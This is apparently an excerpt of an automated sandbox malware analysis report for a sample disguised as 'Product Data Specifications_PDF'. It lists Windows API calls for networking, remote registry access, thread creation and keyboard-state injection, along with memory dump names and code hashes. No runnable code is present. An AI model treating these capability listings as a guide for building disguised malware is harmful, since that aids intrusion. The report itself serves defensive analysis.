                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                              • String ID:
                              • API String ID: 2737351978-0
                              • Opcode ID: 773decce50c93e3f36a11239f8f172856a87eb87626e5f0a1a8c5d5fb2b898c5
                              • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                              • Opcode Fuzzy Hash: 773decce50c93e3f36a11239f8f172856a87eb87626e5f0a1a8c5d5fb2b898c5
                              • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                              APIs
                              • ___set_flsgetvalue.LIBCMT ref: 0041523A
                              • __calloc_crt.LIBCMT ref: 00415246
                              • __getptd.LIBCMT ref: 00415253
                              • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                              • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                              • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                              • _free.LIBCMT ref: 0041529E
                              • __dosmaperr.LIBCMT ref: 004152A9
                                • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                              • String ID:
                              • API String ID: 3638380555-0
                              • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                              • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                              • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                              • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                              APIs
                              • VariantInit.OLEAUT32(?), ref: 0046C96E
                                • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Variant$Copy$ClearErrorInitLast
                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                              • API String ID: 3207048006-625585964
                              • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                              • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                              • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                              • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                              APIs
                              • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                              • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                              • gethostbyname.WSOCK32(?), ref: 004655A6
                              • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                              • _memmove.LIBCMT ref: 004656CA
                              • GlobalFree.KERNEL32(00000000), ref: 0046575C
                              • WSACleanup.WSOCK32 ref: 00465762
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                              • String ID:
                              • API String ID: 2945290962-0
                              • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                              • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                              • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                              • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                              APIs
                              • GetSystemMetrics.USER32(0000000F), ref: 00440527
                              • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                              • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                              • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                              • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                              • String ID:
                              • API String ID: 1457242333-0
                              • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                              • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                              • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                              • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                              APIs
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ConnectRegistry_memmove_wcslen
                              • String ID:
                              • API String ID: 15295421-0
                              • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                              • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                              • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                              • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                              APIs
                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                              • _wcstok.LIBCMT ref: 004675B2
                                • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                              • _wcscpy.LIBCMT ref: 00467641
                              • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                              • _wcslen.LIBCMT ref: 00467793
                              • _wcslen.LIBCMT ref: 004677BD
                                • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                              • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                              • String ID: X
                              • API String ID: 780548581-3081909835
                              • Opcode ID: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                              • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                              • Opcode Fuzzy Hash: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                              • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                              APIs
                                • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                              • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                              • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                              • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                              • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                              • CloseFigure.GDI32(?), ref: 0044751F
                              • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                              • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                              • String ID:
                              • API String ID: 4082120231-0
                              • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                              • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                              • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                              • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                              APIs
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                              • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                              • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                              • String ID:
                              • API String ID: 2027346449-0
                              • Opcode ID: f0ceecdc90b01f2c9ddf0369269a16fa16a69f0e3d9f986347dd5438d1ccccc0
                              • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                              • Opcode Fuzzy Hash: f0ceecdc90b01f2c9ddf0369269a16fa16a69f0e3d9f986347dd5438d1ccccc0
                              • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                              APIs
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                              • GetMenu.USER32 ref: 0047A703
                              • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                              • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                              • _wcslen.LIBCMT ref: 0047A79E
                              • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                              • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                              • String ID:
                              • API String ID: 3257027151-0
                              • Opcode ID: 80d25b5d47cdb8856cfd5c6f23c0a19e515c97fff049208cbae9d6eea43d64d6
                              • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                              • Opcode Fuzzy Hash: 80d25b5d47cdb8856cfd5c6f23c0a19e515c97fff049208cbae9d6eea43d64d6
                              • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                              APIs
                              • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                              • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ErrorLastselect
                              • String ID:
                              • API String ID: 215497628-0
                              • Opcode ID: 0902b8d125b16e906fbee135168885a915a185ebb0dc395c6f8acc5970aa3ebc
                              • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                              • Opcode Fuzzy Hash: 0902b8d125b16e906fbee135168885a915a185ebb0dc395c6f8acc5970aa3ebc
                              • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                              APIs
                              • GetParent.USER32(?), ref: 0044443B
                              • GetKeyboardState.USER32(?), ref: 00444450
                              • SetKeyboardState.USER32(?), ref: 004444A4
                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessagePost$KeyboardState$Parent
                              • String ID:
                              • API String ID: 87235514-0
                              • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                              • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                              • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                              • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                              APIs
                              • GetParent.USER32(?), ref: 00444633
                              • GetKeyboardState.USER32(?), ref: 00444648
                              • SetKeyboardState.USER32(?), ref: 0044469C
                              • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                              • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                              • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                              • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessagePost$KeyboardState$Parent
                              • String ID:
                              • API String ID: 87235514-0
                              • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                              • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                              • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                              • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                              APIs
                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                              • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                              • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                              • DeleteObject.GDI32(?), ref: 00455736
                              • DeleteObject.GDI32(?), ref: 00455744
                              • DestroyIcon.USER32(?), ref: 00455752
                              • DestroyWindow.USER32(?), ref: 00455760
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                              • String ID:
                              • API String ID: 2354583917-0
                              • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                              • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                              • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                              • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
